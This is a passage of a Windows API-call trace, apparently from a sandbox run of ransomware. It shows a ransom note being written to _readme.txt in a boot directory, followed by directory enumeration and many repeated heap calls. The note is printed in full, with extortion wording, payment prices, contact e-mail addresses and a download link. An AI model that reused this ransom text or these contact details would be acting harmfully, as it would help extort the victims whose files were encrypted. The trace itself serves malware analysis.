1116 [0142.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x321dfc8 [0142.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.812] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned 1115 [0142.812] WriteFile (in: hFile=0x6f0, lpBuffer=0x321dfc8*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x9dbfb64, lpOverlapped=0x0 | out: lpBuffer=0x321dfc8*, lpNumberOfBytesWritten=0x9dbfb64*=0x45b, lpOverlapped=0x0) returned 1 [0142.813] CloseHandle (hObject=0x6f0) returned 1 [0142.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321dfc8 | out: hHeap=0x620000) returned 1 [0142.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ab03c8 | out: hHeap=0x620000) returned 1 [0142.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ad6f98 | out: hHeap=0x620000) returned 1 [0142.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.814] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8b993b0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8b993b0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.814] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8b993b0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8b993b0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.814] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0142.814] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8b993b0, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8b993b0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8b993b0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0142.814] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8b993b0, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8b993b0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8b993b0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0142.814] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1730 | out: hHeap=0x620000) returned 1 [0142.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1730 [0142.814] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.820] HeapFree (in: hHeap=0x620000, 